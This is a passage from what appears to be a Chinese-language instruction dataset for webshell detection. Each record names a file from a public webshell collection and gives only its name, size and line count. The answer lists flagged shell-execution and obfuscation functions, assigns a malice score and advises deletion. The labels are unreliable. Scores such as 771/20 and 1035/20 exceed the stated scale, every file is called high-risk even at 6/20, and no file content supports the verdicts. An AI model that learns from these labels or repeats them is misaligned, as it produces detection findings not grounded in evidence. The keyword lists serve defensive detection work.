恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/asp目录可写扫描/wt.aspx", "malicious_score": 12, "md5_hash": "5e4cbd80ebeac95b36585789b7056d30"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"01.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/asp目录可写扫描/01.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dabao.asp\", \"文件类型\": \"asp\", \"文件大小\": \"26593 bytes\", \"行数\": 770}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 发现混淆技术: pack\\s*\\( 恶意度评分: 53/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/陆羽asp打包/dabao.asp", "malicious_score": 53, "md5_hash": "731f4272ef76ac0815bb050046af2d28"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"indexx.asp\", \"文件类型\": \"asp\", \"文件大小\": \"127659 bytes\", \"行数\": 4165}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, Wscript.Shell, request.queryString, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 156/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/DarkBlade1.3--强大的asp大马/indexx.asp", "malicious_score": 156, "md5_hash": "b7f46693648f534c2ca78e3f21685707"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"国外免杀PHP大马_未翻译.php\", \"文件类型\": \"php\", \"文件大小\": \"160973 bytes\", \"行数\": 3112}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 248/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/国外免杀PHP大马_未翻译.php", "malicious_score": 248, "md5_hash": "d42faa5ce099000d3f19c2bcdb153be9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp\", \"文件类型\": \"asp\", \"文件大小\": \"88809 bytes\", \"行数\": 1296}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, REsPonsE.WritE 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 771/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp", "malicious_score": 771, "md5_hash": "77dc7ca49983f28575adc5ce13dd1d87"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"牛逼免杀提权隐藏大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"64262 bytes\", \"行数\": 629}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/牛逼免杀提权隐藏大马.asp", "malicious_score": 195, "md5_hash": "5d4f506d7c18cda7e3e6411929994e8f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"法克僵尸大马 (1).asp\", \"文件类型\": \"asp\", \"文件大小\": \"99974 bytes\", \"行数\": 2061}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, Cmd.exe, eval(, request.form, Request.Form 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 354/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/法克僵尸大马 (1).asp", "malicious_score": 354, "md5_hash": "13f09ca95f4ba29ea97be3b7b853cc8a"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"UnKnown 高级Vip防删收费版 (1).asp\", \"文件类型\": \"asp\", \"文件大小\": \"126915 bytes\", \"行数\": 1746}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.form, Request.Form, response.write, Execute(, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 927/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/UnKnown 高级Vip防删收费版 (1).asp", "malicious_score": 927, "md5_hash": "f4a303c8a56f5d09b575d5ebe6f56f3c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp\", \"文件类型\": \"asp\", \"文件大小\": \"83105 bytes\", \"行数\": 1454}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Eval(, createobject(, Execute(, request.QueryString, wscript.shell 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 279/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp", "malicious_score": 279, "md5_hash": "d01c9a78df3fee765ca0ef024d4971e5"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"法克僵尸大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"99978 bytes\", \"行数\": 2061}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, Cmd.exe, eval(, request.form, Request.Form 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 354/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/法克僵尸大马.asp", "malicious_score": 354, "md5_hash": "cc63e673031ea368bbca25ae4931b42a"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp\", \"文件类型\": \"asp\", \"文件大小\": \"64255 bytes\", \"行数\": 629}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp", "malicious_score": 195, "md5_hash": "267bf56914cf7fe06273a8bea367b6b7"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"免杀php大马.php\", \"文件类型\": \"php\", \"文件大小\": \"138630 bytes\", \"行数\": 2488}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1035/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/免杀php大马.php", "malicious_score": 1035, "md5_hash": "794967b6927e7e1d37cc555ac61ad074"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"国外免杀php大马.php\", \"文件类型\": \"php\", \"文件大小\": \"160964 bytes\", \"行数\": 3112}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 248/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/国外免杀php大马.php", "malicious_score": 248, "md5_hash": "9d739d2512502fa38c7340e41a09f643"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"传说中的草泥马4.0 (1).asp\", \"文件类型\": \"asp\", \"文件大小\": \"93094 bytes\", \"行数\": 1234}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/传说中的草泥马4.0 (1).asp", "malicious_score": 191, "md5_hash": "febbb4648de1845029443e1c6c6154c0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"DOC_ZIBSZXBIEG.php\", \"文件类型\": \"php\", \"文件大小\": \"140482 bytes\", \"行数\": 2488}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1035/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/DOC_ZIBSZXBIEG.php", "malicious_score": 1035, "md5_hash": "89bc832057df6bbd3badc2f62332ffeb"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"银河舰队大马_2014版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"90199 bytes\", \"行数\": 1189}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CReATEoBJEcT( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/银河舰队大马_2014版.asp", "malicious_score": 191, "md5_hash": "39357c86bfee9d90942912193be5e40b"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"非常牛逼的Jsp大马.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30030 bytes\", \"行数\": 994}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/非常牛逼的Jsp大马.jsp", "malicious_score": 37, "md5_hash": "450ab7e8b1cd9ebb09b4fe7d4fcf353c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"不灭之魂2014改进版本.asp\", \"文件类型\": \"asp\", \"文件大小\": \"101643 bytes\", \"行数\": 1373}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, wscript.shell, execute(, CreateObject(, Createobject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 330/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/不灭之魂2014改进版本.asp", "malicious_score": 330, "md5_hash": "66b8b5fa04093f04dd24d3eeb04cba6b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"火狐NEW WebShell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"83098 bytes\", \"行数\": 1454}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Eval(, createobject(, Execute(, request.QueryString, wscript.shell 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 279/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/火狐NEW WebShell.asp", "malicious_score": 279, "md5_hash": "f0c1833c67e9b5f03043607f85f3695f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"土司搞基asp大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"63922 bytes\", \"行数\": 623}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/土司搞基asp大马.asp", "malicious_score": 195, "md5_hash": "c7cb0d58158eacbe8b664a86a33ac675"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"不灭之魂2013改进版本.asp\", \"文件类型\": \"asp\", \"文件大小\": \"101722 bytes\", \"行数\": 1373}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, wscript.shell, execute(, CreateObject(, Createobject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 330/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/不灭之魂2013改进版本.asp", "malicious_score": 330, "md5_hash": "8a1bc8557f10c33587b4583a74af103e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"牛逼免杀提权隐藏大马 (1).asp\", \"文件类型\": \"asp\", \"文件大小\": \"64315 bytes\", \"行数\": 629}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp", "malicious_score": 195, "md5_hash": "a604e7475934aecbe3589e1e824e3eff"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"星外虚拟机提权专用asp大马 (1).asp\", \"文件类型\": \"asp\", \"文件大小\": \"88869 bytes\", \"行数\": 1296}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, REsPonsE.WritE 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 771/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1).asp", "malicious_score": 771, "md5_hash": "af2dcc52e2c145fe8ee9aa035547dc24"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspx经典大马.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"62083 bytes\", \"行数\": 1553}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/aspx经典大马.aspx", "malicious_score": 27, "md5_hash": "beb9de6631505089629a9fc7845f754f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"传说中的草泥马4.0.asp\", \"文件类型\": \"asp\", \"文件大小\": \"93146 bytes\", \"行数\": 1234}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/传说中的草泥马4.0.asp", "malicious_score": 191, "md5_hash": "12fa06759bd3420ad4fd4716e47b3caa"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspmuma.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1605 bytes\", \"行数\": 47}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/aspmuma.asp", "malicious_score": 8, "md5_hash": "1ba7661e69cd613ce13bd72380a71aef"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"星外虚拟机提权专用asp大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"88816 bytes\", \"行数\": 1296}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, REsPonsE.WritE 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 771/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/星外虚拟机提权专用asp大马.asp", "malicious_score": 771, "md5_hash": "bdfae49a25632fba9b44f05dc1240283"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"火狐NEW WebShell (1).asp\", \"文件类型\": \"asp\", \"文件大小\": \"83165 bytes\", \"行数\": 1454}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Eval(, createobject(, Execute(, request.QueryString, wscript.shell 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 279/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/火狐NEW WebShell (1).asp", "malicious_score": 279, "md5_hash": "5c13f23c09557e709e9b57e28a98032c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"最新过安全狗- 免杀PHP大马 -.php\", \"文件类型\": \"php\", \"文件大小\": \"138635 bytes\", \"行数\": 2488}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1035/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php", "malicious_score": 1035, "md5_hash": "b736dab1f9fb39ed1ac70d5830306862"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"银河舰队大马_2012版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"90203 bytes\", \"行数\": 1189}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CReATEoBJEcT( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/银河舰队大马_2012版.asp", "malicious_score": 191, "md5_hash": "8738282045ea77a65a280d426252c78c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp\", \"文件类型\": \"asp\", \"文件大小\": \"63915 bytes\", \"行数\": 623}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp", "malicious_score": 195, "md5_hash": "ba2fd64e96e99bafab8d37a502d91aa0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"UnKnown 高级Vip防删收费版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"126905 bytes\", \"行数\": 1746}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.form, Request.Form, response.write, Execute(, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 927/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp", "malicious_score": 927, "md5_hash": "f780f97930b0f1ef4c39d4f14d17c46c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"土司搞基asp大马 (1).asp\", \"文件类型\": \"asp\", \"文件大小\": \"63975 bytes\", \"行数\": 623}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/www-7jyewu-cn/土司搞基asp大马 (1).asp", "malicious_score": 195, "md5_hash": "5ab8e34f485ed27be8ac21bb0ecb30b6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.php\", \"文件类型\": \"php\", \"文件大小\": \"557 bytes\", \"行数\": 33}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 具备文件操作能力: fopen\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/php/list.php", "malicious_score": 7, "md5_hash": "922b128ddd90e1dc2f73088956c548ed"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"simple-backdoor.php\", \"文件类型\": \"php\", \"文件大小\": \"328 bytes\", \"行数\": 17}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, system( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/php/simple-backdoor.php", "malicious_score": 9, "md5_hash": "f091d1b9274c881f8e41b2f96e6b9936"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.php\", \"文件类型\": \"php\", \"文件大小\": \"320 bytes\", \"行数\": 25}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/php/cmd.php", "malicious_score": 9, "md5_hash": "c38ae5ba61fd84f6bbbab98d89d8a346"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php-backdoor.php\", \"文件类型\": \"php\", \"文件大小\": \"2800 bytes\", \"行数\": 71}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_REQUEST[, system( 具备文件操作能力: fopen\\s*\\(, move_uploaded_file 恶意度评分: 53/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/php/php-backdoor.php", "malicious_score": 53, "md5_hash": "2b5cb105c4ea9b5ebc64705b4bd86bf7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp-reverse.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2451 bytes\", \"行数\": 91}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/jsp/jsp-reverse.jsp", "malicious_score": 12, "md5_hash": "8b0e6779f25a17f0ffb3df14122ba594"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"68110 bytes\", \"行数\": 1802}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 172/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/jsp/browser.jsp", "malicious_score": 172, "md5_hash": "37603e44ee6dc1c359feb68a0d566f76"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1870 bytes\", \"行数\": 77}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/jsp/list.jsp", "malicious_score": 6, "md5_hash": "1ea290ff4259dcaeb680cec992738eda"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"725 bytes\", \"行数\": 32}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/fuzzdb-webshell/jsp/cmdjsp.jsp", 